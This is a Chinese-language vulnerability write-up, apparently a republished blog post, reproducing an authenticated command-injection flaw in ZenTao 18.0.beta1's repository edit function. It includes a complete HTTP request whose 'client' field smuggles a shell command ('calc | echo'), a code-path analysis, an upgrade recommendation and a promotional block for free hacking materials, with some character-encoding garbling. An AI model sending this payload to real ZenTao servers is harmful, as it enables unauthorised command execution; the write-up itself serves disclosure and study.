漏洞簡介

禪道是第一款國產(chǎn)的開源項(xiàng)目管理軟件。它集產(chǎn)品管理、項(xiàng)目管理、質(zhì)量管理、文檔管理、 組織管理和事務(wù)管理于一體，是一款專業(yè)的研發(fā)項(xiàng)目管理軟件，完整地覆蓋了項(xiàng)目管理的核心流程。?禪道管理思想注重實(shí)效，功能完備豐富，操作簡潔高效，界面美觀大方，搜索功能強(qiáng)大，統(tǒng)計(jì)報(bào)表豐富多樣，軟件架構(gòu)合理，擴(kuò)展靈活，有完善的 API 可以調(diào)用。

禪道后臺(tái)存在 RCE 漏洞，均存在于歷史版本，對這些漏洞進(jìn)行復(fù)現(xiàn)分析。

環(huán)境搭建

源碼下載地址?https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip

利用 phpstudy 來進(jìn)行環(huán)境的搭建

?

?

漏洞復(fù)現(xiàn)

登錄后臺(tái)創(chuàng)建 GitLab 類型的代碼庫

點(diǎn)擊 DevOps 模塊的設(shè)置選項(xiàng)，修改創(chuàng)建的代碼庫

點(diǎn)擊保存并抓取數(shù)據(jù)包

修改參數(shù) SCM 和 client SCM 修改為?Subversion? client 修改為?calc | echo "?

觸發(fā)了命令執(zhí)行，執(zhí)行了兩次

??

【----幫助網(wǎng)安學(xué)習(xí)，以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)！加vx：yj009991，備注 “博客園” 獲?。　?/p>

?、?網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
?、?100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
　⑤ 最權(quán)威CISSP 認(rèn)證考試指南+題庫
?、?超1800頁CTF實(shí)戰(zhàn)技巧手冊
?、?最新網(wǎng)安大廠面試題合集（含答案）
?、?APP客戶端安全檢測指南（安卓+IOS）

漏洞分析

發(fā)現(xiàn)有一些分析文章中描述需要先創(chuàng)建一個(gè)代碼倉庫，也指出了創(chuàng)建代碼倉庫的原因，因?yàn)檎{(diào)用的是 edit 方法，所以要先 create

經(jīng)過調(diào)試發(fā)現(xiàn)這是必須的，因?yàn)樵跊]創(chuàng)建代碼庫時(shí)，執(zhí)行 edit 方法，會(huì)提示跳轉(zhuǎn)去創(chuàng)建代碼庫

module/repo/control.php#commonAction?

所以需要先創(chuàng)建代碼庫

module/repo/control.php#create?

module/repo/model.php#create?

在創(chuàng)建代碼庫的時(shí)候有一個(gè)檢查 Client 的操作 只有選擇 Gitlab 才能不做客戶端的檢測操作，直接創(chuàng)建成功

module/repo/model.php#checkClient?

創(chuàng)建成功后執(zhí)行編輯操作觸發(fā)漏洞

POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: test.test
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM
Connection: close
?
SCM=Subversion&client= calc | echo "

module/repo/control.php#edit?

module/repo/model.php#update?

module/repo/model.php#checkConnection?

?

???

修復(fù)建議

更新至最新版本

更多網(wǎng)安技能的在線實(shí)操練習(xí)，請點(diǎn)擊這里>>

???文章來源地址http://www.zghlxwxcb.cn/news/detail-668704.html

到了這里，關(guān)于禪道后臺(tái)命令執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容，請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！